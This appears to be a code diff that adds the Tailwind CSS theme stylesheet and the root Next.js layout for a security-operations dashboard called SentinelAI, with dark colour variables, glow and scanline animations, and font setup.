 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ @import "tailwindcss";
2
+ @import "tw-animate-css";
3
+ @import "shadcn/tailwind.css";
4
+
5
+ @custom-variant dark (&:is(.dark *));
6
+
7
+ @theme inline {
8
+ --color-background: var(--background);
9
+ --color-foreground: var(--foreground);
10
+ --font-sans: var(--font-sans);
11
+ --font-mono: var(--font-geist-mono);
12
+ --font-heading: var(--font-sans);
13
+ --color-sidebar-ring: var(--sidebar-ring);
14
+ --color-sidebar-border: var(--sidebar-border);
15
+ --color-sidebar-accent-foreground: var(--sidebar-accent-foreground);
16
+ --color-sidebar-accent: var(--sidebar-accent);
17
+ --color-sidebar-primary-foreground: var(--sidebar-primary-foreground);
18
+ --color-sidebar-primary: var(--sidebar-primary);
19
+ --color-sidebar-foreground: var(--sidebar-foreground);
20
+ --color-sidebar: var(--sidebar);
21
+ --color-chart-5: var(--chart-5);
22
+ --color-chart-4: var(--chart-4);
23
+ --color-chart-3: var(--chart-3);
24
+ --color-chart-2: var(--chart-2);
25
+ --color-chart-1: var(--chart-1);
26
+ --color-ring: var(--ring);
27
+ --color-input: var(--input);
28
+ --color-border: var(--border);
29
+ --color-destructive: var(--destructive);
30
+ --color-accent-foreground: var(--accent-foreground);
31
+ --color-accent: var(--accent);
32
+ --color-muted-foreground: var(--muted-foreground);
33
+ --color-muted: var(--muted);
34
+ --color-secondary-foreground: var(--secondary-foreground);
35
+ --color-secondary: var(--secondary);
36
+ --color-primary-foreground: var(--primary-foreground);
37
+ --color-primary: var(--primary);
38
+ --color-popover-foreground: var(--popover-foreground);
39
+ --color-popover: var(--popover);
40
+ --color-card-foreground: var(--card-foreground);
41
+ --color-card: var(--card);
42
+ --radius-sm: calc(var(--radius) * 0.6);
43
+ --radius-md: calc(var(--radius) * 0.8);
44
+ --radius-lg: var(--radius);
45
+ --radius-xl: calc(var(--radius) * 1.4);
46
+ --radius-2xl: calc(var(--radius) * 1.8);
47
+ --radius-3xl: calc(var(--radius) * 2.2);
48
+ --radius-4xl: calc(var(--radius) * 2.6);
49
+ }
50
+
51
+ :root {
52
+ --background: oklch(0.12 0.02 250);
53
+ --foreground: oklch(0.96 0.02 200);
54
+ --card: oklch(0.16 0.03 250);
55
+ --card-foreground: oklch(0.96 0.02 200);
56
+ --popover: oklch(0.16 0.03 250);
57
+ --popover-foreground: oklch(0.96 0.02 200);
58
+ --primary: oklch(0.78 0.16 195);
59
+ --primary-foreground: oklch(0.12 0.02 250);
60
+ --secondary: oklch(0.22 0.04 260);
61
+ --secondary-foreground: oklch(0.95 0.02 200);
62
+ --muted: oklch(0.22 0.03 260);
63
+ --muted-foreground: oklch(0.72 0.03 220);
64
+ --accent: oklch(0.72 0.18 150);
65
+ --accent-foreground: oklch(0.12 0.02 250);
66
+ --destructive: oklch(0.62 0.24 25);
67
+ --border: oklch(0.35 0.06 250 / 0.35);
68
+ --input: oklch(0.35 0.06 250 / 0.45);
69
+ --ring: oklch(0.78 0.16 195);
70
+ --chart-1: oklch(0.72 0.18 195);
71
+ --chart-2: oklch(0.68 0.2 150);
72
+ --chart-3: oklch(0.7 0.22 310);
73
+ --chart-4: oklch(0.75 0.12 95);
74
+ --chart-5: oklch(0.6 0.18 25);
75
+ --radius: 0.75rem;
76
+ --sidebar: oklch(0.14 0.03 250);
77
+ --sidebar-foreground: oklch(0.96 0.02 200);
78
+ --sidebar-primary: oklch(0.78 0.16 195);
79
+ --sidebar-primary-foreground: oklch(0.12 0.02 250);
80
+ --sidebar-accent: oklch(0.22 0.04 260);
81
+ --sidebar-accent-foreground: oklch(0.96 0.02 200);
82
+ --sidebar-border: oklch(0.35 0.06 250 / 0.35);
83
+ --sidebar-ring: oklch(0.78 0.16 195);
84
+ }
85
+
86
+ .dark {
87
+ color-scheme: dark;
88
+ }
89
+
90
+ @layer base {
91
+ * {
92
+ @apply border-border outline-ring/50;
93
+ }
94
+ body {
95
+ @apply bg-background text-foreground antialiased;
96
+ background-image:
97
+ radial-gradient(ellipse 120% 80% at 50% -20%, oklch(0.35 0.12 250 / 0.35), transparent),
98
+ radial-gradient(ellipse 80% 50% at 100% 0%, oklch(0.4 0.14 195 / 0.2), transparent),
99
+ linear-gradient(180deg, oklch(0.1 0.02 250) 0%, oklch(0.08 0.02 260) 100%);
100
+ min-height: 100vh;
101
+ }
102
+ html {
103
+ @apply font-sans;
104
+ }
105
+ }
106
+
107
+ .glass-panel {
108
+ @apply rounded-2xl border border-primary/20 bg-card/40 backdrop-blur-xl shadow-[0_0_40px_-12px_oklch(0.7_0.15_195_/_0.45)];
109
+ }
110
+
111
+ .scanline::after {
112
+ content: "";
113
+ pointer-events: none;
114
+ position: absolute;
115
+ inset: 0;
116
+ background: linear-gradient(
117
+ transparent 0%,
118
+ oklch(0.85 0.12 195 / 0.04) 50%,
119
+ transparent 100%
120
+ );
121
+ background-size: 100% 8px;
122
+ animation: scan 6s linear infinite;
123
+ opacity: 0.35;
124
+ }
125
+
126
+ @keyframes scan {
127
+ from {
128
+ background-position: 0 0;
129
+ }
130
+ to {
131
+ background-position: 0 100%;
132
+ }
133
+ }
134
+
135
+ @keyframes pulse-glow {
136
+ 0%,
137
+ 100% {
138
+ box-shadow: 0 0 12px oklch(0.72 0.14 195 / 0.25);
139
+ }
140
+ 50% {
141
+ box-shadow: 0 0 28px oklch(0.75 0.16 195 / 0.55);
142
+ }
143
+ }
144
+
145
+ @keyframes severity-pulse {
146
+ 0%,
147
+ 100% {
148
+ opacity: 1;
149
+ }
150
+ 50% {
151
+ opacity: 0.65;
152
+ }
153
+ }
154
+
155
+ @keyframes terminal-blink {
156
+ 0%,
157
+ 100% {
158
+ opacity: 1;
159
+ }
160
+ 50% {
161
+ opacity: 0;
162
+ }
163
+ }
164
+
165
+ .glow-panel {
166
+ animation: pulse-glow 3.5s ease-in-out infinite;
167
+ }
168
+
169
+ .severity-pulse-critical {
170
+ animation: severity-pulse 1.2s ease-in-out infinite;
171
+ }
172
+
173
+ .threat-row-hot {
174
+ box-shadow: inset 0 0 0 1px oklch(0.65 0.2 25 / 0.35);
175
+ }
176
+
177
+ .cyber-cursor::after {
178
+ content: "▍";
179
+ margin-left: 2px;
180
+ animation: terminal-blink 1s step-end infinite;
181
+ color: oklch(0.78 0.14 195);
182
+ }
frontend/src/app/layout.tsx ADDED
@@ -0,0 +1,33 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import type { Metadata } from "next";
2
+ import { Geist, Geist_Mono } from "next/font/google";
3
+ import "./globals.css";
4
+
5
+ const geistSans = Geist({
6
+ variable: "--font-geist-sans",
7
+ subsets: ["latin"],
8
+ });
9
+
10
+ const geistMono = Geist_Mono({
11
+ variable: "--font-geist-mono",
12
+ subsets: ["latin"],
13
+ });
14
+
15
+ export const metadata: Metadata = {
16
+ title: "SentinelAI — Autonomous AI SOC",
17
+ description:
18
+ "Multi-agent security operations center with live threat correlation, AMD ROCm-ready inference, and enterprise-grade response orchestration.",
19
+ };
20
+
21
+ export default function RootLayout({
22
+ children,
23
+ }: Readonly<{
24
+ children: React.ReactNode;
25
+ }>) {
26
+ return (
27
+ <html lang="en" className="dark">
28
+ <body className={`${geistSans.variable} ${geistMono.variable} antialiased`}>
29
+ {children}
30
+ </body>
31
+ </html>
32
+ );
33
+ }